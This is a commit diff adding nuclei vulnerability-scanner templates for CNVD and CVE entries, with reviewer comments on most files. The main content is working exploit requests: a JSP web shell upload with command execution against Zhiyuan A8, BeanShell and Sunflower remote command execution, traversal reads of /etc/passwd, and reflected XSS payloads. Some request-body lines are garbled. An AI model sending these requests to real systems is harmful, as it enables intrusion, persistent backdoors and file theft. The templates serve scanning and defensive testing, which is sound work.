sullo 2022-02-28 17:31:45 -05:00
commit c9a211b19c
11 changed files with 306 additions and 0 deletions


@ -1,14 +1,23 @@
cnvd/2019/CNVD-2019-19299.yaml
cnvd/2019/CNVD-2019-32204.yaml
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cnvd/2022/CNVD-2022-03672.yaml
cves/2017/CVE-2017-18598.yaml
cves/2018/CVE-2018-16716.yaml
cves/2018/CVE-2018-19365.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/casdoor-login.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/microweber-detect.yaml
technologies/snipeit-panel.yaml
vulnerabilities/other/microweber-xss.yaml
vulnerabilities/wordpress/wp-adaptive-xss.yaml
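Review bot: The entry `exposed-panels/phoronix-pane;.yaml` contains a stray `;` that no template file would be named with, and it breaks the `-panel.yaml` pattern of the neighbouring entries; it most likely should read `exposed-panels/phoronix-panel.yaml`. Whether this line is part of the addition or inherited from the previous revision cannot be told from the rendered section, since only 9 of the 23 lines shown are new, but any tooling that reads this list will fail to resolve the path either way.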


@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Writing to Remote Code Execution
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and
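Review bot: The JSP uploaded by the first request (L65) is a full command-execution page that stays on the target after the scan, while the matchers only need proof that the written file executed; uploading an inert page that prints a `{{randstr}}` marker and matching that marker in `body_2` would give the same evidence without leaving a persistent backdoor, and `description` should state that the template writes a file to the host. As written the positive result is also unreachable: the `pwd` value sent on L67 is not the one the page on L65 compares against, so `contains(body_2, "Windows IP")` can never hold and every target reports negative. The `ipconfig`/`Windows IP` pair is Windows-only in any case, so Linux deployments would be missed even with that fixed, which is another reason to match a marker rather than command output. The body lines `= WUghPB3szB3Xwg66 the CREATEDATE` (L58) and `originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4` (L64) look like a copy that went through machine translation and should be verified against the original DBSTEP request layout before this is merged.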


@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"
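Review bot: The check only succeeds on Unix-like hosts, because the script on L95 reads `/etc/passwd` and the regex on L99 expects `root:.*:0:0:`; an e-cology instance on Windows would be reported as not vulnerable. Either document that limitation in `description`, or have the script emit a `{{randstr}}` marker and match that instead, which is platform-neutral and less intrusive than reading a system file. The same Linux-only assumption applies to the CVE-2018-16716 (`root:[x*]:0:0`, L168) and CVE-2018-19365 (`root:.*:0:0:`, L200) sections. The remediation sentences in `description` on L86 ("Currently, the security patch ... Please take protective measures ...") belong in a separate `remediation:` field, with `description` limited to what the flaw is.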


@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and
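Review bot: The `cnvd2020` tag on L114 does not match the template id `CNVD-2022-03672`; it should be `tags: cnvd,cnvd2022,sunflower,rce`. The extractor regex `'"verify_string":"(.*)"'` on L131 uses a greedy `.*`, so if any field follows `verify_string` in the response the captured group runs to the last quote on the line and `{{cid}}` carries junk into the `Cookie` header on L124; `'"verify_string":"([^"]*)"'` captures only the value. The reference on L112 points at CNVD-2022-10270, a different advisory id from the template's own; if it is related, say so in `description`, otherwise drop it.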


@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2018-19365
info:
name: Wowza Streaming Engine Manager Directory Traversal
author: 0x_Akoko
severity: high
description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request
reference:
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
- https://www.cvedetails.com/cve/CVE-2018-19365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19365
cwe-id: CWE-22
tags: cve,cve2018,wowza,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200


@ -0,0 +1,26 @@
id: casdoor-login
info:
name: Casdoor Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"Casdoor"
tags: panel,casdoor
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Casdoor</title>"
- type: status
status:
- 200
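Review bot: The `shodan-query` value on L214 is a plain scalar that embeds quotes, `http.title:"Casdoor"`, while the other templates in this commit quote the whole value (`'http.favicon.hash:780351152'` on L253 and L282); writing `shodan-query: 'http.title:"Casdoor"'` keeps the metadata style consistent across the set. The body word on L225 requires the exact `<title>Casdoor</title>` text, so a deployment with a customised title is missed; that is acceptable for an info-level panel check but worth stating in a comment next to the matcher.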


@ -7605,6 +7605,11 @@ requests:
words:
- var reachclientproductname = "skype for business web 应用"
- type: word
name: microweber
words:
- '"generator" content="Microweber" />'
- type: word
name: mihalism-multi-host
words:
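Review bot: The Microweber word on L238, `'"generator" content="Microweber" />'`, matches only one exact rendering of the generator meta tag (this attribute order, this content value, a self-closing ` />`); a page that emits `<meta name="generator" content="Microweber">` without the slash, or appends a version to the content value, would not be detected. Matching the shorter `content="Microweber"` covers those variants at the cost of a slightly looser check. The same word is used in the microweber-detect section (L264) and the two should be changed together so the aggregated and standalone detections agree. The enclosing `matchers` list starts and ends outside this hunk.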


@ -0,0 +1,26 @@
id: microweber-detect
info:
name: Microweber Detect
author: princechaddha
severity: info
reference: https://github.com/microweber/microweber
metadata:
shodan-query: 'http.favicon.hash:780351152'
tags: tech,microweber,oss
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"generator" content="Microweber" />'
- type: status
status:
- 200


@ -0,0 +1,34 @@
id: microweber-xss
info:
name: Microweber XSS
author: gy741
severity: medium
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://github.com/microweber/microweber/issues/809
- https://github.com/microweber/microweber
metadata:
shodan-query: 'http.favicon.hash:780351152'
tags: microweber,xss,oss
requests:
- method: GET
path:
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" 0="filetype=images"'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
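Review bot: The request path on L287 ends in `#path=`; everything after `#` is a URL fragment and clients normally drop it before sending, so the server probably never receives `path=` (this depends on how nuclei serialises `{{BaseURL}}` paths and should be confirmed). If the reflection matched on L293 does not depend on it, remove the fragment so the request is minimal; if it does, the parameter has to move into the query string, otherwise the template will report false negatives.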


@ -0,0 +1,33 @@
id: wp-adaptive-xss
info:
name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
- https://plugins.trac.wordpress.org/changeset/2655683
tags: wordpress,xss,wp-plugin,wp
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true"
matchers-condition: and
matchers:
- type: word
words:
- '<img/src/onerror=alert(document.domain)>'
- '<td>Image</td>'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
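Review bot: This template has no `classification` block, unlike the CVE templates in this commit; if the WPScan advisory referenced on L312 has a CVE assigned, add `classification` with `cve-id`, `cwe-id: CWE-79` and the CVSS vector, and otherwise note in `description` that no CVE exists. The `description` on L310 also lacks a terminating period, unlike the other templates, so a `.` should be appended.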